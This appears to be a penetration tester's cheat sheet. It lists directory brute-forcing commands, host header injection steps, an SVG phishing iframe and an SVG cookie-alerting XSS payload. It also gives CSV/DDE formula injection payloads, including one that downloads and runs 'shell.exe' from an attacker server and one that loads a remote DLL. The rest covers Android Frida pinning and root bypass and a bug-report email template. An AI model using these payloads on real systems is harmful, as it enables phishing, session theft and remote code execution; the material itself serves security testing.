Decode String Here
Encode String Here
Integrity : data only change by auth.
Avalability : Available data when user need.
Confidentility : Data access by auth.
dirb https://domain.com/ /usr/share/wordlists/dirb/big.txt
gobuster -u http://fakebank.com -w wordlist.txt dir
dirb https://domain.com/ /usr/share/wordlists/wfuzz/vulns/dirTraversal-nix.txt
https://penetesterhelper.github.io/clickjacking.html?url=https://penetesterhelper.github.io
V1.0 & V1.1 is vulnerable
nmap -Pn --script ssl-enum-ciphers {domain} -p {port}
1. Basic
Change "Host" header and check response is 200 OK or not if response is 200 Ok then find 302 response
2. via middleware (for password reseting)
Add X-Forwarded-Host: domain.com
3. via dangling markup
Try "Host: domain.com" to "Host: domain.com:attacker.com"
1. Phising Attack
<svg width="1500" height="1500"
xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">
<foreignObject width="1500px" height="1500px">
<iframe xmlns="http://www.w3.org/1999/xhtml" style="width: 1500px; height: 1500px;" src="https://numberless-holddown.000webhostapp.com/"/>
</foreignObject>
</svg>
2. XSS
<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
<rect width="300" height="100" style="fill:rgb(0,0,255);stroke-width:3;stroke:rgb(0,0,0)" />
<script type="text/javascript">
alert(document.cookie);
</script>
</svg>
DDE ("cmd";"/C calc";"!A0")A0
@SUM(1+9)*cmd|' /C calc'!A0
=10+20+cmd|' /C calc'!A0
=cmd|' /C notepad'!'A1'
=cmd|'/C powershell IEX(wget attacker_server/shell.exe)'!A0
=cmd|'/c rundll32.exe \\10.0.0.1\3\2\1.dll,0'!_xlbgnm.A1
=@MSEXCEL|'\..\..\..\Windows\System32\cmd.exe /c calc.exe'!_xlbgnm.A1
https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/CORS%20Misconfiguration/README.md
1. Decompiling apk
apktool d apk_name
2. Compiling apk
apktool b apk_name
keytool -genkey -v -keystore my-release-key.keystore -alias alias_name -keyalg RSA -keysize 2048 -validity 10000
java -jar .\apksigner.jar sign --ks my-release-key.keystore app-debug.apk
frida-ps -U
python3 fridump.py -U -s "UPCL Smart Billing"
Reference: http://pentestcorner.com/fridump-android-examples/
1. Tools
1) Android Emulator API 32
2) BurpSuit
2. Install Frida in Android Emulator
adb push frida_server /data/local/tmp
adb push ca_cert /data/local/tmp
3. Install Frida in Windows or Linux
pip3 install frida-tools
pip3 install objection frida-tools
4. Package Name
frida-ps -Ua
SSL Bypass
objection -g pakage_name explore
android sslpinning disable
Root Bypass
frida -U --codeshare dzonerzy/fridantiroot -f YOUR_BINARY
adb root
adb pull /data/app/{package-name} /{location}
adb push {file.path} {location}
adb shell am start -n {package_name}/.{activity_name}
Subject: Security Vulnerabilities Found on Website
Dear [name],
I recently visited your website and noticed a bug while I was navigating through the pages. I am writing to notify you that I have identified several security vulnerabilities on your website. Specifically, I discovered an [Vulnerability_Name] These are serious issues which could potentially lead to a data breach or other malicious activities if left unaddressed. As such it is important that these issues be addressed as soon as possible in order to protect your website from potential threats. Please let me know how you would like me to proceed with providing additional information about these findings so we can work together towards resolving them quickly and efficiently for the safety of your customers’ data and other sensitive information stored within the system.
POC: [POC]
Sincerely
[Your Name]